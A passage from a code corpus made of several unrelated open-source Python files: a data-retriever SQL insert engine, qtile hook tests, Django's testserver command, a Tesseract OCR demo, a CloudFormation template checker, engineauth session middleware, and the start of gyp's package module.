search_path = search_path.format(dataset=self.script.shortname)
file_path = os.path.join(search_path, filename)
if file_exists(file_path):
return file_path
return False
def format_data_dir(self):
"""Returns the correctly formatted raw data directory location."""
return DATA_WRITE_PATH.format(dataset=self.script.shortname)
def format_filename(self, filename):
"""Returns the full path of a file in the archive directory."""
return os.path.join(self.format_data_dir(), filename)
def format_insert_value(self, value, datatype):
"""Formats a value for an insert statement, for example by surrounding
it in single quotes."""
datatype = datatype.split('-')[-1]
strvalue = str(value).strip()
# Remove any quotes already surrounding the string
quotes = ["'", '"']
if len(strvalue) > 1 and strvalue[0] == strvalue[-1] and strvalue[0] in quotes:
strvalue = strvalue[1:-1]
nulls = ("null", "none")
if strvalue.lower() in nulls:
return "null"
elif datatype in ("int", "bigint", "bool"):
if strvalue:
intvalue = strvalue.split('.')[0]
if intvalue:
return int(intvalue)
else:
return "null"
else:
return "null"
elif datatype in ("double", "decimal"):
if strvalue:
return strvalue
else:
return "null"
elif datatype=="char":
if strvalue.lower() in nulls:
return "null"
# automatically escape quotes in string fields
if hasattr(self.table, "escape_double_quotes") and self.table.escape_double_quotes:
strvalue = self.escape_double_quotes(strvalue)
if hasattr(self.table, "escape_single_quotes") and self.table.escape_single_quotes:
strvalue = self.escape_single_quotes(strvalue)
return "'" + strvalue + "'"
#elif datatype=="bool":
#return "'true'" if value else "'false'"
else:
return "null"
def get_cursor(self):
"""Gets the db cursor."""
if self._cursor is None:
self._cursor = self.connection.cursor()
return self._cursor
cursor = property(get_cursor)
def get_input(self):
"""Manually get user input for connection information when script is
run from terminal."""
for opt in self.required_opts:
if not (opt[0] in self.opts.keys()):
if opt[0] == "password":
print opt[1]
self.opts[opt[0]] = getpass.getpass(" ")
else:
prompt = opt[1]
if opt[2]:
prompt += " or press Enter for the default, %s" % opt[2]
prompt += ': '
self.opts[opt[0]] = raw_input(prompt)
if self.opts[opt[0]] in ["", "default"]:
self.opts[opt[0]] = opt[2]
def insert_data_from_archive(self, url, filenames):
"""Insert data from files located in an online archive. This function
extracts the file, inserts the data, and deletes the file if raw data
archiving is not set."""
self.download_files_from_archive(url, filenames)
for filename in filenames:
file_path = self.find_file(filename)
if file_path:
self.insert_data_from_file(file_path)
else:
raise Exception("File not found: %s" % filename)
def insert_data_from_file(self, filename):
"""The default function to insert data from a file. This function
simply inserts the data row by row. Database platforms with support
for inserting bulk data from files can override this function."""
data_source = (skip_rows,
(self.table.header_rows,
(open, (filename, 'r'))))
self.add_to_table(data_source)
def insert_data_from_url(self, url):
"""Insert data from a web resource, such as a text file."""
filename = filename_from_url(url)
find = self.find_file(filename)
if find:
# Use local copy
self.insert_data_from_file(find)
else:
# Save a copy of the file locally, then load from that file
self.create_raw_data_dir()
print "Saving a copy of " + filename + "..."
self.download_file(url, filename)
self.insert_data_from_file(self.find_file(filename))
def insert_statement(self, values):
"""Returns a SQL statement to insert a set of values."""
columns = self.table.get_insert_columns()
types = self.table.get_column_datatypes()
columncount = len(self.table.get_insert_columns(False))
insert_stmt = "INSERT INTO " + self.table_name()
insert_stmt += " (" + columns + ")"
insert_stmt += " VALUES ("
for i in range(0, columncount):
insert_stmt += "%s, "
insert_stmt = insert_stmt.rstrip(", ") + ");"
n = 0
while len(values) < insert_stmt.count("%s"):
values.append(self.format_insert_value(None,
types[n]))
n += 1
insert_stmt %= tuple([str(value) for value in values])
if self.debug: print insert_stmt
return insert_stmt
def table_exists(self, dbname, tablename):
"""This can be overridden to return True if a table exists. It
returns False by default."""
return False
def table_name(self, name=None, dbname=None):
"""Returns the full tablename."""
if not name:
name = self.table.name
if not dbname:
dbname = self.database_name()
if not dbname: dbname = ''
return self.opts["table_name"].format(db=dbname, table=name)
def warning(self, warning):
new_warning = Warning('%s:%s' % (self.script.shortname, self.table.name), warning)
self.warnings.append(new_warning)
def skip_rows(rows, source):
"""Skip over the header lines by reading them before processing."""
lines = gen_from_source(source)
for i in range(rows):
lines.next()
return lines
def file_exists(path):
"""Returns true if a file exists and its size is greater than 0."""
return (os.path.isfile(path) and os.path.getsize(path) > 0)
def filename_from_url(url):
return url.split('/')[-1].split('?')[0]
def gen_from_source(source):
"""Returns a generator from a source tuple.
Source tuples are of the form (callable, args) where callable(*args)
returns either a generator or another source tuple.
This allows indefinite regeneration of data sources."""
while isinstance(source, tuple):
gen, args = source
source = gen(*args)
return source | mit |
qtile/qtile | test/test_hook.py | 2 | 5257 | # Copyright (c) 2009 Aldo Cortesi
# Copyright (c) 2011 Florian Mounier
# Copyright (c) 2011 Anshuman Bhaduri
# Copyright (c) 2012 Tycho Andersen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import logging
from multiprocessing import Value
import pytest
import libqtile.log_utils
import libqtile.utils
from libqtile import hook
from libqtile.resources import default_config
from test.conftest import BareConfig
# TODO: more tests required.
# 1. Check all hooks that can be fired
class Call:
def __init__(self, val):
self.val = val
def __call__(self, val):
self.val = val
@pytest.fixture
def hook_fixture():
libqtile.log_utils.init_log(logging.CRITICAL, log_path=None, log_color=False)
yield
hook.clear()
def test_cannot_fire_unknown_event():
with pytest.raises(libqtile.utils.QtileError):
hook.fire("unknown")
@pytest.mark.usefixtures("hook_fixture")
def test_hook_calls_subscriber():
test = Call(0)
hook.subscribe.group_window_add(test)
hook.fire("group_window_add", 8)
assert test.val == 8
@pytest.mark.usefixtures("hook_fixture")
def test_hook_calls_subscriber_async():
val = 0
async def co(new_val):
nonlocal val
val = new_val
hook.subscribe.group_window_add(co)
hook.fire("group_window_add", 8)
assert val == 8
@pytest.mark.usefixtures("hook_fixture")
def test_hook_calls_subscriber_async_co():
val = 0
async def co(new_val):
nonlocal val
val = new_val
hook.subscribe.group_window_add(co(8))
hook.fire("group_window_add")
assert val == 8
@pytest.mark.usefixtures("hook_fixture")
def test_hook_calls_subscriber_async_in_existing_loop():
async def t():
val = 0
async def co(new_val):
nonlocal val
val = new_val
hook.subscribe.group_window_add(co(8))
hook.fire("group_window_add")
await asyncio.sleep(0)
assert val == 8
asyncio.run(t())
@pytest.mark.usefixtures("hook_fixture")
def test_subscribers_can_be_added_removed():
test = Call(0)
hook.subscribe.group_window_add(test)
assert hook.subscriptions
hook.clear()
assert not hook.subscriptions
@pytest.mark.usefixtures("hook_fixture")
def test_can_unsubscribe_from_hook():
test = Call(0)
hook.subscribe.group_window_add(test)
hook.fire("group_window_add", 3)
assert test.val == 3
hook.unsubscribe.group_window_add(test)
hook.fire("group_window_add", 4)
assert test.val == 3
def test_can_subscribe_to_startup_hooks(manager_nospawn):
config = BareConfig
for attr in dir(default_config):
if not hasattr(config, attr):
setattr(config, attr, getattr(default_config, attr))
manager = manager_nospawn
manager.startup_once_calls = Value('i', 0)
manager.startup_calls = Value('i', 0)
manager.startup_complete_calls = Value('i', 0)
def inc_startup_once_calls():
manager.startup_once_calls.value += 1
def inc_startup_calls():
manager.startup_calls.value += 1
def inc_startup_complete_calls():
manager.startup_complete_calls.value += 1
hook.subscribe.startup_once(inc_startup_once_calls)
hook.subscribe.startup(inc_startup_calls)
hook.subscribe.startup_complete(inc_startup_complete_calls)
manager.start(config)
assert manager.startup_once_calls.value == 1
assert manager.startup_calls.value == 1
assert manager.startup_complete_calls.value == 1
# Restart and check that startup_once doesn't fire again
manager.terminate()
manager.start(config, no_spawn=True)
assert manager.startup_once_calls.value == 1
assert manager.startup_calls.value == 2
assert manager.startup_complete_calls.value == 2
@pytest.mark.usefixtures('hook_fixture')
def test_can_update_by_selection_change(manager):
test = Call(0)
hook.subscribe.selection_change(test)
hook.fire('selection_change', 'hello')
assert test.val == 'hello'
@pytest.mark.usefixtures('hook_fixture')
def test_can_call_by_selection_notify(manager):
test = Call(0)
hook.subscribe.selection_notify(test)
hook.fire('selection_notify', 'hello')
assert test.val == 'hello'
| mit |
libscie/liberator | liberator/lib/python3.6/site-packages/django/core/management/commands/testserver.py | 126 | 2146 | from django.core.management import call_command
from django.core.management.base import BaseCommand
from django.db import connection
class Command(BaseCommand):
help = 'Runs a development server with data from the given fixture(s).'
requires_system_checks = False
def add_arguments(self, parser):
parser.add_argument(
'args', metavar='fixture', nargs='*',
help='Path(s) to fixtures to load before running the server.',
)
parser.add_argument(
'--noinput', '--no-input', action='store_false', dest='interactive', default=True,
help='Tells Django to NOT prompt the user for input of any kind.',
)
parser.add_argument(
'--addrport', default='',
help='Port number or ipaddr:port to run the server on.',
)
parser.add_argument(
'--ipv6', '-6', action='store_true', dest='use_ipv6', default=False,
help='Tells Django to use an IPv6 address.',
)
def handle(self, *fixture_labels, **options):
verbosity = options['verbosity']
interactive = options['interactive']
# Create a test database.
db_name = connection.creation.create_test_db(verbosity=verbosity, autoclobber=not interactive, serialize=False)
# Import the fixture data into the test database.
call_command('loaddata', *fixture_labels, **{'verbosity': verbosity})
# Run the development server. Turn off auto-reloading because it causes
# a strange error -- it causes this handle() method to be called
# multiple times.
shutdown_message = (
'\nServer stopped.\nNote that the test database, %r, has not been '
'deleted. You can explore it on your own.' % db_name
)
use_threading = connection.features.test_db_allows_multiple_connections
call_command(
'runserver',
addrport=options['addrport'],
shutdown_message=shutdown_message,
use_reloader=False,
use_ipv6=options['use_ipv6'],
use_threading=use_threading
)
| cc0-1.0 |
ttacon/tesseract | contrib/tesseract-c_api-demo.py | 21 | 2184 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2012 Zdenko Podobný
# Author: Zdenko Podobný
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Simple python demo script of tesseract-ocr 3.02 c-api
"""
import os
import sys
import ctypes
# Demo variables
lang = "eng"
filename = "../phototest.tif"
libpath = "/usr/local/lib64/"
libpath_w = "../vs2008/DLL_Release/"
TESSDATA_PREFIX = os.environ.get('TESSDATA_PREFIX')
if not TESSDATA_PREFIX:
TESSDATA_PREFIX = "../"
if sys.platform == "win32":
libname = libpath_w + "libtesseract302.dll"
libname_alt = "libtesseract302.dll"
os.environ["PATH"] += os.pathsep + libpath_w
else:
libname = libpath + "libtesseract.so.3.0.2"
libname_alt = "libtesseract.so.3"
try:
tesseract = ctypes.cdll.LoadLibrary(libname)
except:
try:
tesseract = ctypes.cdll.LoadLibrary(libname_alt)
except WindowsError, err:
print("Trying to load '%s'..." % libname)
print("Trying to load '%s'..." % libname_alt)
print(err)
exit(1)
tesseract.TessVersion.restype = ctypes.c_char_p
tesseract_version = tesseract.TessVersion()[:4]
# We need to check library version because libtesseract.so.3 is symlink
# and can point to other version than 3.02
if float(tesseract_version) < 3.02:
print("Found tesseract-ocr library version %s." % tesseract_version)
print("C-API is present only in version 3.02!")
exit(2)
api = tesseract.TessBaseAPICreate()
rc = tesseract.TessBaseAPIInit3(api, TESSDATA_PREFIX, lang);
if (rc):
tesseract.TessBaseAPIDelete(api)
print("Could not initialize tesseract.\n")
exit(3)
text_out = tesseract.TessBaseAPIProcessPages(api, filename, None , 0);
result_text = ctypes.string_at(text_out)
print result_text
| apache-2.0 |
flou/brume | brume/checker.py | 1 | 9946 | """Brume CloudFormation checker."""
import json
import logging
import os
import sys
import click
import crayons
from six import string_types
LOGGER = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
CFN_REF = "Ref"
CFN_GETATT = "Fn::GetAtt"
class Stack:
"""A CloudFormation Stack."""
def __init__(self, name):
self.name = name
self.outputs = {}
self.resources = {}
self.template_url = ""
# Parameters that are passed when declaring the stack as a resource
# of the main stack
self.input_parameters = {}
# Parameters defined in the Parameters section of the template
self.parameters = {}
def find(self, key):
"""
Return a list of resources and outputs that contain `key`.
find('Fn::GetAtt') returns the list of nodes (resources and outputs)
that use the GetAtt function.
>>> from brume.checker import Stack
>>> stack = Stack('Main').load_from_file('cloudformation/Main.cform')
>>> stack.find('Fn::GetAtt')
"""
return sum(
[list(Stack.find_nodes(nodes, key)) for nodes in [self.resources, self.outputs]], []
)
def missing_refs(self):
"""
Detect missing Ref statements.
Return a list of Ref statements that point to non-existing resources or
parameters in the template.
"""
return [ref for ref in self.find(CFN_REF) if not self.has_ref(ref)]
def has_ref(self, ref):
"""
Check that ``ref`` points to a resource that is actually declared in the
template or in the parameters of the stack.
"""
return ref in self.resources or ref in self.parameters
def missing_getatt(self):
"""
Detect missing GetAtt statements.
Return a list of GetAtt statements that point to non-existing resources
or parameters in the template.
"""
return [ref for ref in self.find(CFN_GETATT) if not self.has_getatt(ref)]
def has_getatt(self, getatt):
"""
Check that ``getatt`` points to a resource that is actually declared in
the template or in the parameters of the stack.
"""
return getatt[0] in self.resources or getatt[0] in self.parameters
def missing_parameters(self):
"""
Detect missing parameters.
Return a list of parameters that are expected in the substack with no
default value but have no parameter in the main stack.
"""
return [
param_name
for param_name, param in self.parameters.items()
if param_name not in self.input_parameters and "Default" not in param
]
def extra_parameters(self):
"""
Detect extra parameters.
Return a list of parameters that are passed from the main stack but are
not expected in the substack definition.
"""
return [
param_name
for param_name, _ in self.input_parameters.items()
if param_name not in self.parameters
]
def load_from_file(self, name=None):
"""Create a Stack from its template."""
stack_name = name if name else self.name
try:
with open(stack_name, "r") as f_template:
template = json.load(f_template)
except IOError as err:
click.echo("Template for stack {0} not found".format(stack_name), err=True)
click.echo(err, err=True)
sys.exit(1)
self.outputs = template.get("Outputs", {})
self.parameters = template.get("Parameters", {})
self.resources = template.get("Resources", {})
return self
def substacks(self):
"""Return the current stack nested stacks."""
return {
stack_name: substack
for stack_name, substack in self.resources.items()
if substack["Type"] == "AWS::CloudFormation::Stack"
}
def detect_parameter_name_mismatch(self):
"""Detect possible mismatch between parameter names and outputs."""
for stack_name, substack in self.substacks().items():
for parameter_name, param in substack["Properties"].get("Parameters", {}).items():
if CFN_GETATT in param:
output_name = param[CFN_GETATT][1].replace("Outputs.", "")
if parameter_name != output_name:
source_stack = param[CFN_GETATT][0]
warning_message = (
"Possible parameter name mismatch: output {}.{} is given to {}.{}"
)
click.echo(
warning_message.format(
source_stack,
crayons.yellow(output_name),
stack_name,
crayons.yellow(parameter_name),
)
)
@staticmethod
def new_substack(stack_name, resource):
"""Create a substack."""
newstack = Stack(stack_name)
newstack.input_parameters = resource["Properties"].get("Parameters", {})
newstack.template_url = resource["Properties"].get("TemplateURL", {})
return newstack
@staticmethod
def aws_pseudo_parameter(v):
"""Check that `v` is an AWS pseudo-parameter (like AWS::Region) or resource type."""
return isinstance(v, string_types) and v.upper().startswith("AWS::")
@staticmethod
def find_nodes(node, key):
"""
Return nodes that match a node type and key.
Recursively parses the template to find nodes.
"""
if isinstance(node, dict):
for k, v in node.items():
if Stack.aws_pseudo_parameter(v):
continue
if k == key:
yield v
elif isinstance(v, list):
for n in v:
for id_val in Stack.find_nodes(n, key):
yield id_val
elif isinstance(v, dict):
for id_val in Stack.find_nodes(v, key):
yield id_val
elif isinstance(node, list):
for k in node:
for id_val in Stack.find_nodes(k, key):
yield id_val
else:
return
def check_templates(template):
"""
Checks:
- that there are parameters sent from the main stack for every expected
parameter in the substacks
- that `Ref` and `GetAtt` point to existing resources or parameters in the
template
- that the outputs used as params in the main stack exist in the substacks
"""
templates_path, filename = os.path.split(os.path.realpath(template))
main_stack_name, filetype = os.path.splitext(filename)
main_stack = Stack(main_stack_name)
main_stack.load_from_file(os.path.join(templates_path, filename))
stacks = {
name: Stack.new_substack(name, resource)
for name, resource in main_stack.resources.items()
if resource["Type"] == "AWS::CloudFormation::Stack"
}
stacks[main_stack_name] = main_stack
main_stack.detect_parameter_name_mismatch()
error = False
for name, substack in stacks.items():
substack_path = os.path.join(templates_path, name) + filetype
LOGGER.debug("Loading Stack %s file %s", name, substack_path)
substack.load_from_file(substack_path)
if name != main_stack_name:
# We don't validate Parameters on the Main stack
for param in substack.missing_parameters():
click.echo(
"Stack {0} should give substack {1} parameter: {2}".format(
crayons.yellow(main_stack_name), crayons.yellow(name), crayons.red(param)
),
err=True,
)
error = True
for param in substack.extra_parameters():
click.echo(
"Stack {0} is giving extra parameter {1} to substack: {2}".format(
crayons.yellow(main_stack_name), crayons.red(param), crayons.yellow(name)
),
err=True,
)
error = True
for ref in substack.missing_refs():
click.echo(
"Stack {0} has undefined {1} statement: {2}".format(
crayons.yellow(name), crayons.yellow("Ref"), crayons.red(ref)
),
err=True,
)
error = True
for getatt in substack.missing_getatt():
click.echo(
"Stack {0} has undefined {1} statement: {2}.{3}".format(
crayons.yellow(name),
crayons.yellow("GetAtt"),
crayons.red(getatt[0]),
getatt[1],
),
err=True,
)
error = True
# Special case for the Main stack GetAtt
for att in main_stack.find(CFN_GETATT):
if att[1].startswith("Outputs.") and att[0] in stacks:
stack = stacks[att[0]]
output_name = att[1].replace("Outputs.", "")
if output_name not in stacks[att[0]].outputs:
click.echo(
"Stack {0} references undefined Output {1} from substack {2}".format(
crayons.yellow(main_stack_name),
crayons.red(output_name),
crayons.yellow(stack.name),
),
err=True,
)
error = True
if not error:
click.echo(crayons.green("Congratulations, your templates appear to be OK!\n"))
else:
sys.exit(error)
| mit |
wri/gfw-api | lib/engineauth/middleware.py | 1 | 6320 | from __future__ import absolute_import
from engineauth import models
from engineauth import utils
from engineauth.config import load_config
import re
import traceback
from webob import Response
from webob import Request
class EngineAuthResponse(Response):
def _save_session(self):
session = self.request.session
if self.request.path == '/user/sign_out':
return session
# Compare the hash that we set in load_session to the current one.
# We only save the session and cookie if this value has changed.
if self.request.session_hash == session.hash():
return session
session.put()
# If we have a user_id we want to updated the
# session to use the user_id as the key.
if session.user_id is not None:
session_id = session.key.id()
if session_id != session.user_id:
session = models.Session.upgrade_to_user_session(
session_id, session.user_id)
if "globalforestwatch.org" in self.request.host_url:
self.set_cookie('_eauth', session.serialize(),domain='.globalforestwatch.org')
else:
self.set_cookie('_eauth', session.serialize())
return self
def _save_user(self):
pass
class EngineAuthRequest(Request):
ResponseClass = EngineAuthResponse
def _load_session(self):
value = self.cookies.get('_eauth')
session = None
if value:
session = models.Session.get_by_value(value)
if session is not None:
# Create a hash for later comparison,
# to determine if a put() is required
session_hash = session.hash()
else:
session = models.Session.create()
# set this to False to ensure a cookie
# is saved later in the response.
session_hash = '0'
self.session = session
self.session_hash = session_hash
return self
def _get_user_class(self):
try:
return utils.import_class(self._config['user_model'])
except Exception:
return models.User
def _load_user(self):
if self.session is not None and self.session.user_id:
self.user = self._get_user_class().get_by_id(int(self.session.user_id))
if self.user is None:
# TODO: If the user_id from the session returns no user,
# then remove it.
pass
else:
self.user = None
return self
def _load_user_by_profile(self, profile):
# if the user is logged in update that user with the profile details
if self.user:
self.user.add_profile(profile)
# else get or create a user based on the profile
else:
self.user = self._get_user_class().get_or_create_by_profile(profile)
# Add user to session
self.session.user_id = self.user.get_id()
load_user_by_profile = _load_user_by_profile
def _add_message(self, message, level=None, key='_messages'):
if not self.session.data.get(key):
self.session.data[key] = []
return self.session.data[key].append({
'message': message, 'level': level})
add_message = _add_message
def _get_messages(self, key='_messages'):
try:
return self.session.data.pop(key)
except KeyError:
pass
get_messages = _get_messages
def _set_redirect_back(self):
next_uri = self.referer
if next_uri is not None and self._config['redirect_back']:
self.session.data['_redirect_uri'] = next_uri
set_redirect_uri = _set_redirect_back
def _get_redirect_uri(self):
try:
return self.session.data.pop('_redirect_uri').encode('utf-8')
except KeyError:
return self._config['success_uri']
get_redirect_uri = _get_redirect_uri
def _set_globals(self, environ):
# environ['ea.config'] = req.config
environ['ea.session'] = self.session
environ['ea.user'] = self.user
class AuthMiddleware(object):
def __init__(self, app, config=None):
self.app = app
self._config = load_config(config)
self._url_parse_re = re.compile(r'%s/([^\s/]+)/*(\S*)' %
(self._config['base_uri']))
def __call__(self, environ, start_response):
# If the request is to the admin, return
if environ['PATH_INFO'].startswith('/_ah/'):
return self.app(environ, start_response)
# load session
req = EngineAuthRequest(environ)
req._config = self._config
req._load_session()
req._load_user()
if req._config['redirect_back']:
req._set_redirect_back()
resp = None
# If the requesting url is for engineauth load the strategy
if environ['PATH_INFO'].startswith(self._config['base_uri']):
# extract provider and additional params from the url
provider, provider_params = self._url_parse_re.match(
req.path_info).group(1, 2)
if provider:
req.provider = provider
req.provider_params = provider_params
# load the desired strategy class
strategy_class = self._load_strategy(provider)
resp = req.get_response(strategy_class(self.app, self._config))
if resp.request is None:
# TODO: determine why this is necessary.
resp.request = req
if resp is None:
resp = req.get_response(self.app)
# Save session, return response
resp._save_session()
return resp(environ, start_response)
def _load_strategy(self, provider):
try:
strategy_location = self._config[
'provider.{0}'.format(provider)]['class_path']
return utils.import_class(strategy_location)
except Exception, e:
traceback.print_exc()
raise(Exception, "You must provide a location for the {0} "\
"strategy. Add a 'location' key to the "\
"'provider.{0}' config dict".format(provider))
| gpl-2.0 |
rafaeltomesouza/frontend-class1 | aula2/a11/linkedin/client/.gradle/yarn/node_modules/node-gyp/gyp/pylib/gyp/__init__.py | 1524 | 22178 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
import gyp.input
import optparse
import os.path
import re
import shlex
import sys
import traceback
from gyp.common import GypError
# Default debug modes for GYP
debug = {}
# List of "official" debug modes, but you can use anything you like.
DEBUG_GENERAL = 'general'
DEBUG_VARIABLES = 'variables'
DEBUG_INCLUDES = 'includes'
def DebugOutput(mode, message, *args):
if 'all' in gyp.debug or mode in gyp.debug:
ctx = ('unknown', 0, 'unknown')
try:
f = traceback.extract_stack(limit=2)
if f:
ctx = f[0][:3]
except:
pass
if args:
message %= args
print '%s:%s:%d:%s %s' % (mode.upper(), os.path.basename(ctx[0]),
ctx[1], ctx[2], message)
def FindBuildFiles():
extension = '.gyp'
files = os.listdir(os.getcwd())
build_files = []
for file in files:
if file.endswith(extension):
build_files.append(file)
return build_files
def Load(build_files, format, default_variables={},
includes=[], depth='.', params=None, check=False,
circular_check=True, duplicate_basename_check=True):
"""
Loads one or more specified build files.
default_variables and includes will be copied before use.
Returns the generator for the specified format and the
data returned by loading the specified build files.
"""
if params is None:
params = {}
if '-' in format:
format, params['flavor'] = format.split('-', 1)
default_variables = copy.copy(default_variables)
# Default variables provided by this program and its modules should be
# named WITH_CAPITAL_LETTERS to provide a distinct "best practice" namespace,
# avoiding collisions with user and automatic variables.
default_variables['GENERATOR'] = format
default_variables['GENERATOR_FLAVOR'] = params.get('flavor', '')
# Format can be a custom python file, or by default the name of a module
# within gyp.generator.
if format.endswith('.py'):
generator_name = os.path.splitext(format)[0]
path, generator_name = os.path.split(generator_name)
# Make sure the path to the custom generator is in sys.path
# Don't worry about removing it once we are done. Keeping the path
# to each generator that is used in sys.path is likely harmless and
# arguably a good idea.
path = os.path.abspath(path)
if path not in sys.path:
sys.path.insert(0, path)
else:
generator_name = 'gyp.generator.' + format
# These parameters are passed in order (as opposed to by key)
# because ActivePython cannot handle key parameters to __import__.
generator = __import__(generator_name, globals(), locals(), generator_name)
for (key, val) in generator.generator_default_variables.items():
default_variables.setdefault(key, val)
# Give the generator the opportunity to set additional variables based on
# the params it will receive in the output phase.
if getattr(generator, 'CalculateVariables', None):
generator.CalculateVariables(default_variables, params)
# Give the generator the opportunity to set generator_input_info based on
# the params it will receive in the output phase.
if getattr(generator, 'CalculateGeneratorInputInfo', None):
generator.CalculateGeneratorInputInfo(params)
# Fetch the generator specific info that gets fed to input, we use getattr
# so we can default things and the generators only have to provide what
# they need.
generator_input_info = {
'non_configuration_keys':
getattr(generator, 'generator_additional_non_configuration_keys', []),
'path_sections':
getattr(generator, 'generator_additional_path_sections', []),
'extra_sources_for_rules':
getattr(generator, 'generator_extra_sources_for_rules', []),
'generator_supports_multiple_toolsets':
getattr(generator, 'generator_supports_multiple_toolsets', False),
'generator_wants_static_library_dependencies_adjusted':
getattr(generator,
'generator_wants_static_library_dependencies_adjusted', True),
'generator_wants_sorted_dependencies':
getattr(generator, 'generator_wants_sorted_dependencies', False),
'generator_filelist_paths':
getattr(generator, 'generator_filelist_paths', None),
}
# Process the input specific to this generator.
result = gyp.input.Load(build_files, default_variables, includes[:],
depth, generator_input_info, check, circular_check,
duplicate_basename_check,
params['parallel'], params['root_targets'])
return [generator] + result
def NameValueListToDict(name_value_list):
"""
Takes an array of strings of the form 'NAME=VALUE' and creates a dictionary
of the pairs. If a string is simply NAME, then the value in the dictionary
is set to True. If VALUE can be converted to an integer, it is.
"""
result = { }
for item in name_value_list:
tokens = item.split('=', 1)
if len(tokens) == 2:
# If we can make it an int, use that, otherwise, use the string.
try:
token_value = int(tokens[1])
except ValueError:
token_value = tokens[1]
# Set the variable to the supplied value.
result[tokens[0]] = token_value
else:
# No value supplied, treat it as a boolean and set it.
result[tokens[0]] = True
return result
def ShlexEnv(env_name):
flags = os.environ.get(env_name, [])
if flags:
flags = shlex.split(flags)
return flags
def FormatOpt(opt, value):
if opt.startswith('--'):
return '%s=%s' % (opt, value)
return opt + value
def RegenerateAppendFlag(flag, values, predicate, env_name, options):
"""Regenerate a list of command line flags, for an option of action='append'.
The |env_name|, if given, is checked in the environment and used to generate
an initial list of options, then the options that were specified on the
command line (given in |values|) are appended. This matches the handling of
environment variables and command line flags where command line flags override
the environment, while not requiring the environment to be set when the flags
are used again.
"""
flags = []
if options.use_environment and env_name:
for flag_value in ShlexEnv(env_name):
value = FormatOpt(flag, predicate(flag_value))
if value in flags:
flags.remove(value)
flags.append(value)
if values:
for flag_value in values:
flags.append(FormatOpt(flag, predicate(flag_value)))
return flags
def RegenerateFlags(options):
"""Given a parsed options object, and taking the environment variables into
account, returns a list of flags that should regenerate an equivalent options
object (even in the absence of the environment variables.)
Any path options will be normalized relative to depth.
The format flag is not included, as it is assumed the calling generator will
set that as appropriate.
"""
def FixPath(path):
path = gyp.common.FixIfRelativePath(path, options.depth)
if not path:
return os.path.curdir
return path
def Noop(value):
return value
# We always want to ignore the environment when regenerating, to avoid
# duplicate or changed flags in the environment at the time of regeneration.
flags = ['--ignore-environment']
for name, metadata in options._regeneration_metadata.iteritems():
opt = metadata['opt']
value = getattr(options, name)
value_predicate = metadata['type'] == 'path' and FixPath or Noop
action = metadata['action']
env_name = metadata['env_name']
if action == 'append':
flags.extend(RegenerateAppendFlag(opt, value, value_predicate,
env_name, options))
elif action in ('store', None): # None is a synonym for 'store'.
if value:
flags.append(FormatOpt(opt, value_predicate(value)))
elif options.use_environment and env_name and os.environ.get(env_name):
flags.append(FormatOpt(opt, value_predicate(os.environ.get(env_name))))
elif action in ('store_true', 'store_false'):
if ((action == 'store_true' and value) or
(action == 'store_false' and not value)):
flags.append(opt)
elif options.use_environment and env_name:
print >>sys.stderr, ('Warning: environment regeneration unimplemented '
'for %s flag %r env_name %r' % (action, opt,
env_name))
else:
print >>sys.stderr, ('Warning: regeneration unimplemented for action %r '
'flag %r' % (action, opt))
return flags
class RegeneratableOptionParser(optparse.OptionParser):
def __init__(self):
self.__regeneratable_options = {}
optparse.OptionParser.__init__(self)
def add_option(self, *args, **kw):
"""Add an option to the parser.
This accepts the same arguments as OptionParser.add_option, plus the
following:
regenerate: can be set to False to prevent this option from being included
in regeneration.
env_name: name of environment variable that additional values for this
option come from.
type: adds type='path', to tell the regenerator that the values of
this option need to be made relative to options.depth
"""
env_name = kw.pop('env_name', None)
if 'dest' in kw and kw.pop('regenerate', True):
dest = kw['dest']
# The path type is needed for regenerating, for optparse we can just treat
# it as a string.
type = kw.get('type')
if type == 'path':
kw['type'] = 'string'
self.__regeneratable_options[dest] = {
'action': kw.get('action'),
'type': type,
'env_name': env_name,
'opt': args[0],
}
optparse.OptionParser.add_option(self, *args, **kw)
def parse_args(self, *args):
values, args = optparse.OptionParser.parse_args(self, *args)
values._regeneration_metadata = self.__regeneratable_options
return values, args
def gyp_main(args):
my_name = os.path.basename(sys.argv[0])
parser = RegeneratableOptionParser()
usage = 'usage: %s [options ...] [build_file ...]'
parser.set_usage(usage.replace('%s', '%prog'))
parser.add_option('--build', dest='configs', action='append',
help='configuration for build after project generation')
parser.add_option('--check', dest='check', action='store_true',
help='check format of gyp files')
parser.add_option('--config-dir', dest='config_dir', action='store',
env_name='GYP_CONFIG_DIR', default=None,
help='The location for configuration files like '
'include.gypi.')
parser.add_option('-d', '--debug', dest='debug', metavar='DEBUGMODE',
action='append', default=[], help='turn on a debugging '
'mode for debugging GYP. Supported modes are "variables", '
'"includes" and "general" or "all" for all of them.')
parser.add_option('-D', dest='defines', action='append', metavar='VAR=VAL',
env_name='GYP_DEFINES',
help='sets variable VAR to value VAL')
parser.add_option('--depth', dest='depth', metavar='PATH', type='path',
help='set DEPTH gyp variable to a relative path to PATH')
